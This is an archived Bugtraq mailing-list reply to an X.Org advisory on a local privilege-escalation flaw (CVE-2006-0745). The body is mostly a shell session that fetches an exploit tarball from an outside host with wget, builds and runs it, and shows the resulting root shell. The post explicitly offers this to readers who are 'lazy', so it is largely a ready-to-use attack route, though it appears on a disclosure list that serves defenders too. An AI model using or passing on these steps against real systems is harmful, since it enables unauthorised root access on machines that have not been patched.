Bugtraq mailing list archives
Re: [CVE-2006-0745] X.Org Security Advisory: privilege escalation and DoS in X11R6.9, X11R7.0
From: H D Moore <sflist () digitaloffense net>
Date: Mon, 20 Mar 2006 13:40:45 -0600
Two second exploit, but if anyone is lazy: $ wget http://metasploit.com/users/hdm/tools/xmodulepath.tgz $ tar -zpxvf xmodulepath.tgz $ cd xmodulepath $ ./root.sh /bin/rm -f exploit.o exploit.so shell *.o *.so gcc -fPIC -c exploit.c gcc -shared -nostdlib exploit.o -o exploit.so gcc -o shell shell.c X Window System Version 7.0.0 Release Date: 21 December 2005 X Protocol Version 11, Revision 0, Release 7.0 [ snip ] r00t # id uid=0(root) gid=100(users) groups=10(wheel),18(audio)... On Monday 20 March 2006 08:00, Daniel Stone wrote:
X.Org Security Advisory, March 20th 2006 Local privilege escalation in X.Org server 1.0.0 and later; X11R6.9.0 and X11R7.0 CVE-ID: CVE-2006-0745
Current thread:
- [CVE-2006-0745] X.Org Security Advisory: privilege escalation and DoS in X11R6.9, X11R7.0 Daniel Stone (Mar 20)
- Re: [CVE-2006-0745] X.Org Security Advisory: privilege escalation and DoS in X11R6.9, X11R7.0 H D Moore (Mar 20)
- Re: [CVE-2006-0745] X.Org Security Advisory: privilege escalation and DoS in X11R6.9, X11R7.0 Alan Coopersmith (Mar 22)
- Re: [CVE-2006-0745] X.Org Security Advisory: privilege escalation and DoS in X11R6.9, X11R7.0 Kyle Sallee (Mar 23)